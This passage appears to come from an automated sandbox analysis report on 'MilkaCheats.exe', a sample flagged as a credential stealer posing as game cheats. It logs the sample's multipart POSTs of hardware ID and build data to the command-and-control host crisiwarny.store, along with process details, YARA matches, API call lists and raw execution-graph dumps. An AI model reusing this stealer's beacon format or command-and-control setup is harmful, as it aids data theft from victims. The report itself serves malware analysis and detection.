                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2B1sfBoA%2FIwYWiKwseGbEoaHRPaFN1VDkOgiX1NC642jdPYtbGiTZxwe4ESkoaPN1vVriSJZ6fbrzNUQr157MS8YwiRxOi9etNv5XU3Qdm9EXaY2gIFSJTw0vz3kGJ7vDw94F"}],"group":"cf-nel","max_age":604800}
                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                            Server: cloudflare
                                                                                            CF-RAY: 8d93cf9fdd1c6c52-DFW
                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1196&sent=7&recv=14&lost=0&retrans=0&sent_bytes=2839&recv_bytes=9728&delivery_rate=2627949&cwnd=251&unsent_bytes=0&cid=9e7de4b13eb59359&ts=1635&x=0"
                                                                                            2024-10-27 15:45:05 UTC | 23 | IN | Data Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 30 0d 0a
                                                                                            Data Ascii: 11ok 173.254.250.90
                                                                                            2024-10-27 15:45:05 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                            Data Ascii: 0


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            4 | 192.168.2.4 | 49740 | 172.67.170.64 | 443 | 6428 | C:\Users\user\Desktop\MilkaCheats.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            2024-10-27 15:45:06 UTC | 282 | OUT | POST /api HTTP/1.1
                                                                                            Connection: Keep-Alive
                                                                                            Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                            Content-Length: 20442
                                                                                            Host: crisiwarny.store
                                                                                            2024-10-27 15:45:06 UTC | 15331 | OUT | Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 32 43 31 46 31 41 41 36 34 39 36 31 31 37 32 36 33 45 34 36 44 43 44 38 35 30 30 39 41 35 34 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 35 35 37 34 33
                                                                                            Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"E2C1F1AA6496117263E46DCD85009A54--be85de5ipdocierre1Content-Disposition: form-data; name="pid"3--be85de5ipdocierre1Content-Disposition: form-data; name="lid"yau6Na--55743
                                                                                            2024-10-27 15:45:07 UTC | 1014 | IN | HTTP/1.1 200 OK
                                                                                            Date: Sun, 27 Oct 2024 15:45:07 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: close
                                                                                            Set-Cookie: PHPSESSID=ectbll4ot2ru7gni9r84og0f01; expires=Thu, 20 Feb 2025 09:31:46 GMT; Max-Age=9999999; path=/
                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            cf-cache-status: DYNAMIC
                                                                                            vary: accept-encoding
                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BH%2BdvKLzMwvAkvvC3OpPls8bbAF%2FzI5BBvwFRop4XRwl2y4GR2XWbc7fbHKsISXeF9hbkThiQM8OoeTDsXr3oyg7VtQbFDo%2F4OZxZJni%2FNuL3fWZBsNdmokOkrNLr2O4A0XM"}],"group":"cf-nel","max_age":604800}
                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                            Server: cloudflare
                                                                                            CF-RAY: 8d93cfafaa32e873-DFW
                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1282&sent=12&recv=25&lost=0&retrans=0&sent_bytes=2839&recv_bytes=21404&delivery_rate=2192278&cwnd=251&unsent_bytes=0&cid=92d612d9f43344e2&ts=1036&x=0"
                                                                                            2024-10-27 15:45:07 UTC | 23 | IN | Data Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 30 0d 0a
                                                                                            Data Ascii: 11ok 173.254.250.90
                                                                                            2024-10-27 15:45:07 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                            Data Ascii: 0


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            5 | 192.168.2.4 | 49741 | 172.67.170.64 | 443 | 6428 | C:\Users\user\Desktop\MilkaCheats.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            2024-10-27 15:45:09 UTC | 281 | OUT | POST /api HTTP/1.1
                                                                                            Connection: Keep-Alive
                                                                                            Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                            Content-Length: 1288
                                                                                            Host: crisiwarny.store
                                                                                            2024-10-27 15:45:09 UTC | 1288 | OUT | Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 32 43 31 46 31 41 41 36 34 39 36 31 31 37 32 36 33 45 34 36 44 43 44 38 35 30 30 39 41 35 34 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 35 35 37 34 33
                                                                                            Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"E2C1F1AA6496117263E46DCD85009A54--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"yau6Na--55743
                                                                                            2024-10-27 15:45:09 UTC | 1014 | IN | HTTP/1.1 200 OK
                                                                                            Date: Sun, 27 Oct 2024 15:45:09 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: close
                                                                                            Set-Cookie: PHPSESSID=if7clolk2ttlqr2u9tgkbh9oq6; expires=Thu, 20 Feb 2025 09:31:48 GMT; Max-Age=9999999; path=/
                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            cf-cache-status: DYNAMIC
                                                                                            vary: accept-encoding
                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qnFcuEjMxUCr3Jw8VxWY%2F6aqddWohuNpDSx8%2BeIjtmr2bBk6%2BWbPCz6%2FGLJpdAF%2FaFFYYr4qDKKXUUPv9X7VyK0qY9MvoJrokcN3GFDgeUc4ROYUXB1Pv4Lh%2FtQrt8ixcdKr"}],"group":"cf-nel","max_age":604800}
                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                            Server: cloudflare
                                                                                            CF-RAY: 8d93cfc02d51e528-DFW
                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1207&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2837&recv_bytes=2205&delivery_rate=2333601&cwnd=251&unsent_bytes=0&cid=e0659a23e88d9f94&ts=555&x=0"
                                                                                            2024-10-27 15:45:09 UTC | 23 | IN | Data Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 30 0d 0a
                                                                                            Data Ascii: 11ok 173.254.250.90
                                                                                            2024-10-27 15:45:09 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                            Data Ascii: 0


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            6 | 192.168.2.4 | 49743 | 172.67.170.64 | 443 | 6428 | C:\Users\user\Desktop\MilkaCheats.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            2024-10-27 15:45:10 UTC | 283 | OUT | POST /api HTTP/1.1
                                                                                            Connection: Keep-Alive
                                                                                            Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                            Content-Length: 584404
                                                                                            Host: crisiwarny.store
                                                                                            2024-10-27 15:45:10 UTC | 15331 | OUT | Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 32 43 31 46 31 41 41 36 34 39 36 31 31 37 32 36 33 45 34 36 44 43 44 38 35 30 30 39 41 35 34 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 35 35 37 34 33
                                                                                            Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"E2C1F1AA6496117263E46DCD85009A54--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"yau6Na--55743
                                                                                            2024-10-27 15:45:14 UTC | 1023 | IN | HTTP/1.1 200 OK
                                                                                            Date: Sun, 27 Oct 2024 15:45:14 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: close
                                                                                            Set-Cookie: PHPSESSID=rkch9u6a5bii6q0mv5725rmov4; expires=Thu, 20 Feb 2025 09:31:52 GMT; Max-Age=9999999; path=/
                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            cf-cache-status: DYNAMIC
                                                                                            vary: accept-encoding
                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aiWyrWo0eb7JeoW3sUJQtTVGqZx4C3XX%2FITX%2FUbLjwqauha1ns%2F%2Fm83xslY9hywzxqEi4YVKXdpwTd0WlN6LyhMTuiGw1kBLxBD%2FSdKItMGzjU6QO1k0p%2BReW6KUyk%2FCG5jM"}],"group":"cf-nel","max_age":604800}
                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                            Server: cloudflare
                                                                                            CF-RAY: 8d93cfcadd07878a-DFW
                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1180&sent=225&recv=621&lost=0&retrans=0&sent_bytes=2839&recv_bytes=586995&delivery_rate=2601976&cwnd=235&unsent_bytes=0&cid=e6bc6b76df598ffe&ts=3432&x=0"


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            7 | 192.168.2.4 | 49748 | 172.67.170.64 | 443 | 6428 | C:\Users\user\Desktop\MilkaCheats.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            2024-10-27 15:45:14 UTC | 264 | OUT | POST /api HTTP/1.1
                                                                                            Connection: Keep-Alive
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                            Content-Length: 87
                                                                                            Host: crisiwarny.store
                                                                                            2024-10-27 15:45:14 UTC | 87 | OUT | Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 79 61 75 36 4e 61 2d 2d 35 35 37 34 33 34 30 36 32 35 26 6a 3d 26 68 77 69 64 3d 45 32 43 31 46 31 41 41 36 34 39 36 31 31 37 32 36 33 45 34 36 44 43 44 38 35 30 30 39 41 35 34
                                                                                            Data Ascii: act=get_message&ver=4.0&lid=yau6Na--5574340625&j=&hwid=E2C1F1AA6496117263E46DCD85009A54
                                                                                            2024-10-27 15:45:15 UTC | 1007 | IN | HTTP/1.1 200 OK
                                                                                            Date: Sun, 27 Oct 2024 15:45:15 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: close
                                                                                            Set-Cookie: PHPSESSID=s0f0dhdv313vvcr8gm3robjm74; expires=Thu, 20 Feb 2025 09:31:54 GMT; Max-Age=9999999; path=/
                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            cf-cache-status: DYNAMIC
                                                                                            vary: accept-encoding
                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Vj0tNrmxoRAk8aFTmloygwppWx1T5RZzYLtfKVkLEQOHbFHwNnp2%2FIENC4DtuD16tfka7YBBzbXW1G03Rty5L%2BTn6tapPkuv3orYKfyb%2BbCJqDRADPbfE6ELa570mZodGr3M"}],"group":"cf-nel","max_age":604800}
                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                            Server: cloudflare
                                                                                            CF-RAY: 8d93cfe3eca03587-DFW
                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1193&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2838&recv_bytes=987&delivery_rate=2280314&cwnd=251&unsent_bytes=0&cid=99a1b34407d3b916&ts=524&x=0"
                                                                                            2024-10-27 15:45:15 UTC | 54 | IN | Data Raw: 33 30 0d 0a 47 30 4d 4f 48 46 6a 78 53 43 5a 41 64 63 43 72 61 4c 58 77 75 43 68 59 31 71 55 2b 71 4c 4c 46 30 45 69 2b 4f 6b 4b 31 76 37 68 41 48 67 3d 3d 0d 0a
                                                                                            Data Ascii: 30G0MOHFjxSCZAdcCraLXwuChY1qU+qLLF0Ei+OkK1v7hAHg==
                                                                                            2024-10-27 15:45:15 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                            Data Ascii: 0


                                                                                            Target ID:0
                                                                                            Start time:11:44:56
                                                                                            Start date:27/10/2024
                                                                                            Path:C:\Users\user\Desktop\MilkaCheats.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Users\user\Desktop\MilkaCheats.exe"
                                                                                            Imagebase:0xc0000
                                                                                            File size:536'576 bytes
                                                                                            MD5 hash:906C60B268404ECDA308E2692A3AAAF8
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:low
                                                                                            Has exited:true

                                                                                            Target ID:1
                                                                                            Start time:11:44:56
                                                                                            Start date:27/10/2024
                                                                                            Path:C:\Users\user\Desktop\MilkaCheats.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Users\user\Desktop\MilkaCheats.exe"
                                                                                            Imagebase:0xc0000
                                                                                            File size:536'576 bytes
                                                                                            MD5 hash:906C60B268404ECDA308E2692A3AAAF8
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000003.1726270504.0000000001342000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000003.1768149959.0000000001342000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                            Reputation:low
                                                                                            Has exited:true

                                                                                            Target ID:4
                                                                                            Start time:11:44:57
                                                                                            Start date:27/10/2024
                                                                                            Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6232 -s 232
                                                                                            Imagebase:0x450000
                                                                                            File size:483'680 bytes
                                                                                            MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true


                                                                                              Execution Graph

                                                                                              Execution Coverage:1.4%
                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                              Signature Coverage:4.2%
                                                                                              Total number of Nodes:569
                                                                                              Total number of Limit Nodes:15
LeaveCriticalSection 40731->40741 40733->40708 40734 cf924 40734->40708 40736->40710 40737->40715 40739->40721 40740->40721 40741->40733 40742->40734 40744 c6b09 std::_Facet_Register 43 API calls 40743->40744 40745 c2215 40744->40745 40747 c2223 40745->40747 40748 c60e2 47 API calls 5 library calls 40745->40748 40747->40664 40748->40747 40750 c6725 40749->40750 40751 c4e26 40750->40751 40759 d03d8 40750->40759 40751->40667 40757 c374f 41 API calls 40751->40757 40755 c678c 40755->40751 40777 cbbec 40755->40777 40757->40671 40758->40667 40760 d0321 ___scrt_is_nonwritable_in_current_image 40759->40760 40761 d0334 40760->40761 40763 d0354 40760->40763 40791 d030e 14 API calls __dosmaperr 40761->40791 40765 d0359 40763->40765 40766 d0366 40763->40766 40764 d0339 40792 cb6ef 41 API calls _Deallocate 40764->40792 40793 d030e 14 API calls __dosmaperr 40765->40793 40783 d6125 40766->40783 40770 c6771 40770->40751 40776 cc927 68 API calls _Deallocate 40770->40776 40772 d0376 40794 d030e 14 API calls __dosmaperr 40772->40794 40773 d0383 40795 d03c1 LeaveCriticalSection __fread_nolock 40773->40795 40776->40755 40778 cbbff _Deallocate 40777->40778 40821 cbac7 40778->40821 40780 cbc0b 40781 cb42b _Deallocate 41 API calls 40780->40781 40782 cbc17 40781->40782 40782->40751 40784 d6131 ___scrt_is_nonwritable_in_current_image 40783->40784 40796 cf8b0 EnterCriticalSection 40784->40796 40786 d613f 40797 d61c9 40786->40797 40791->40764 40792->40770 40793->40770 40794->40770 40795->40770 40796->40786 40798 d61ec 40797->40798 40799 d6244 40798->40799 40806 d614c 40798->40806 40814 cba9f EnterCriticalSection 40798->40814 40815 cbab3 LeaveCriticalSection 40798->40815 40816 d5459 14 API calls 2 library calls 40799->40816 40801 d624d 40817 d54b6 14 API calls __dosmaperr 40801->40817 40804 d6256 40804->40806 40818 d5a41 6 API calls std::_Lockit::_Lockit 40804->40818 40811 d6185 40806->40811 40808 d6275 40819 cba9f EnterCriticalSection 40808->40819 40810 d6288 40810->40806 40820 cf8f8 
LeaveCriticalSection 40811->40820 40813 d036f 40813->40772 40813->40773 40814->40798 40815->40798 40816->40801 40817->40804 40818->40808 40819->40810 40820->40813 40822 cbad3 ___scrt_is_nonwritable_in_current_image 40821->40822 40823 cbadd 40822->40823 40824 cbb00 40822->40824 40847 cb672 29 API calls _Deallocate 40823->40847 40831 cbaf8 40824->40831 40832 cba9f EnterCriticalSection 40824->40832 40827 cbb1e 40833 cbb5e 40827->40833 40829 cbb2b 40848 cbb56 LeaveCriticalSection __fread_nolock 40829->40848 40831->40780 40832->40827 40834 cbb8e 40833->40834 40835 cbb6b 40833->40835 40845 cbb86 40834->40845 40849 cbe59 40834->40849 40873 cb672 29 API calls _Deallocate 40835->40873 40842 cbbba 40866 d5fb2 40842->40866 40845->40829 40847->40831 40848->40831 40850 cbba6 40849->40850 40851 cbe72 40849->40851 40855 d5cc8 40850->40855 40851->40850 40852 d5efa __fread_nolock 41 API calls 40851->40852 40853 cbe8e 40852->40853 40875 d6b8f 40853->40875 40856 d5cdf 40855->40856 40857 cbbae 40855->40857 40856->40857 40917 d54b6 14 API calls __dosmaperr 40856->40917 40859 d5efa 40857->40859 40860 d5f1b 40859->40860 40861 d5f06 40859->40861 40860->40842 40918 d030e 14 API calls __dosmaperr 40861->40918 40863 d5f0b 40919 cb6ef 41 API calls _Deallocate 40863->40919 40865 d5f16 40865->40842 40867 d5fdb 40866->40867 40872 cbbc1 40866->40872 40868 d602a 40867->40868 40870 d6002 40867->40870 40928 cb672 29 API calls _Deallocate 40868->40928 40920 d5f21 40870->40920 40872->40845 40874 d54b6 14 API calls __dosmaperr 40872->40874 40873->40845 40874->40845 40878 d6b9b ___scrt_is_nonwritable_in_current_image 40875->40878 40876 d6ba3 40876->40850 40877 d6c5f 40916 cb672 29 API calls _Deallocate 40877->40916 40878->40876 40878->40877 40880 d6bf0 40878->40880 40886 dc0e2 EnterCriticalSection 40880->40886 40882 d6bf6 40883 d6c13 40882->40883 40887 d6c97 40882->40887 40915 d6c57 LeaveCriticalSection __wsopen_s 40883->40915 40886->40882 40888 d6cbc 40887->40888 40914 d6cdf __wsopen_s 40887->40914 
40889 d6cc0 40888->40889 40891 d6d1e 40888->40891 40890 cb672 _Deallocate 29 API calls 40889->40890 40890->40914 40892 d6d35 40891->40892 40893 d8475 __wsopen_s 43 API calls 40891->40893 40894 d67e4 __wsopen_s 42 API calls 40892->40894 40893->40892 40895 d6d3f 40894->40895 40896 d6d85 40895->40896 40897 d6d45 40895->40897 40900 d6d99 40896->40900 40901 d6de8 WriteFile 40896->40901 40898 d6d4c 40897->40898 40899 d6d6f 40897->40899 40906 d677c __wsopen_s 6 API calls 40898->40906 40898->40914 40902 d63aa __wsopen_s 47 API calls 40899->40902 40904 d6dd6 40900->40904 40905 d6da1 40900->40905 40903 d6e0a GetLastError 40901->40903 40912 d6d80 40901->40912 40902->40912 40903->40912 40907 d6862 __wsopen_s 7 API calls 40904->40907 40908 d6dc4 40905->40908 40909 d6da6 40905->40909 40906->40914 40907->40914 40910 d6a26 __wsopen_s 8 API calls 40908->40910 40911 d6daf 40909->40911 40909->40914 40910->40912 40913 d693d __wsopen_s 7 API calls 40911->40913 40912->40914 40913->40914 40914->40883 40915->40876 40916->40876 40917->40857 40918->40863 40919->40865 40921 d5f2d ___scrt_is_nonwritable_in_current_image 40920->40921 40929 dc0e2 EnterCriticalSection 40921->40929 40923 d5f3b 40924 d5f6c 40923->40924 40930 d6085 40923->40930 40943 d5fa6 LeaveCriticalSection __wsopen_s 40924->40943 40927 d5f8f 40927->40872 40928->40872 40929->40923 40931 dc35e __wsopen_s 41 API calls 40930->40931 40932 d6095 40931->40932 40933 d609b 40932->40933 40934 d60cd 40932->40934 40936 dc35e __wsopen_s 41 API calls 40932->40936 40935 dc2cd __wsopen_s 15 API calls 40933->40935 40934->40933 40937 dc35e __wsopen_s 41 API calls 40934->40937 40942 d60f3 __wsopen_s 40935->40942 40938 d60c4 40936->40938 40939 d60d9 CloseHandle 40937->40939 40940 dc35e __wsopen_s 41 API calls 40938->40940 40939->40933 40941 d60e5 GetLastError 40939->40941 40940->40934 40941->40933 40942->40924 40943->40927 40944->40675 40945->40677 40947 c25e6 40946->40947 40949 c2604 40947->40949 40955 c4a6e 40947->40955 40949->40578 40963 c5e2f 
40950->40963 40952 c27dc 40953 c2795 40952->40953 40967 c3ccb 43 API calls 2 library calls 40952->40967 40953->40577 40956 c4a7a __EH_prolog3_catch 40955->40956 40957 c4b1f std::locale::_Setgloballocale 40956->40957 40958 c25d7 51 API calls 40956->40958 40957->40949 40961 c4a99 40958->40961 40959 c4b17 40960 c27d4 51 API calls 40959->40960 40960->40957 40961->40959 40962 c4022 43 API calls 40961->40962 40962->40959 40963->40952 40964 c85fa 40963->40964 40968 ca12c 8 API calls ___vcrt_FlsGetValue 40964->40968 40966 c85ff 40966->40952 40967->40953 40968->40966 40970 c503e __EH_prolog3_catch 40969->40970 40971 c25d7 51 API calls 40970->40971 40972 c5050 40971->40972 40973 c4022 43 API calls 40972->40973 40974 c50db 40973->40974 40975 c27d4 51 API calls 40974->40975 40976 c50e3 std::locale::_Setgloballocale 40975->40976 40976->40583 40978 c4096 40977->40978 40979 c40b2 40977->40979 40983 c33a3 40978->40983 40979->40588 40982 cbbec 71 API calls 40982->40979 40986 c33bf 40983->40986 40988 c33f1 40983->40988 40984 c6b4c __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 40985 c3409 40984->40985 40985->40982 40986->40988 40989 ccc29 69 API calls _Deallocate 40986->40989 40988->40984 40989->40988 40990->40603 40991 c53a2 40992 c53cc 40991->40992 40993 c53ab 40991->40993 40993->40992 40996 cbf30 40993->40996 40995 c53bf 40997 cbf42 40996->40997 40998 cbf4b ___scrt_uninitialize_crt 40996->40998 41012 cbdb4 70 API calls ___scrt_uninitialize_crt 40997->41012 41001 cbf5c 40998->41001 41004 cbd54 40998->41004 41000 cbf48 41000->40995 41001->40995 41005 cbd60 ___scrt_is_nonwritable_in_current_image 41004->41005 41013 cba9f EnterCriticalSection 41005->41013 41007 cbd6e 41014 cbec2 41007->41014 41011 cbd91 41011->40995 41012->41000 41013->41007 41015 cbed7 _Deallocate 41014->41015 41016 cbede 41015->41016 41017 cbee9 41015->41017 41028 cbdb4 70 API calls ___scrt_uninitialize_crt 41016->41028 41019 cbe59 ___scrt_uninitialize_crt 66 API calls 41017->41019 41020 
cbef3 41019->41020 41023 d5efa __fread_nolock 41 API calls 41020->41023 41026 cbee4 41020->41026 41021 cb42b _Deallocate 41 API calls 41022 cbd7f 41021->41022 41027 cbda8 LeaveCriticalSection __fread_nolock 41022->41027 41024 cbf0a 41023->41024 41029 d632d 45 API calls 3 library calls 41024->41029 41026->41021 41027->41011 41028->41026 41029->41026

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • DeleteFileA.KERNELBASE(static.lib), ref: 000C5AFD
                                                                                              • VirtualProtect.KERNELBASE(00141038,000004E4,00000040,?), ref: 000C5B10
                                                                                              • GetProcessHeap.KERNEL32(00000008,00000400), ref: 000C5B28
                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 000C5B2B
                                                                                              • wsprintfA.USER32 ref: 000C5B3D
                                                                                              • GetStdHandle.KERNEL32(000000F5,00000000,00000000,00000000,00000000), ref: 000C5B4D
                                                                                              • WriteConsoleA.KERNEL32(00000000), ref: 000C5B54
                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 000C5B5C
                                                                                              • HeapFree.KERNEL32(00000000), ref: 000C5B5F
                                                                                                • Part of subcall function 000C22BB: _strlen.LIBCMT ref: 000C22D3
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
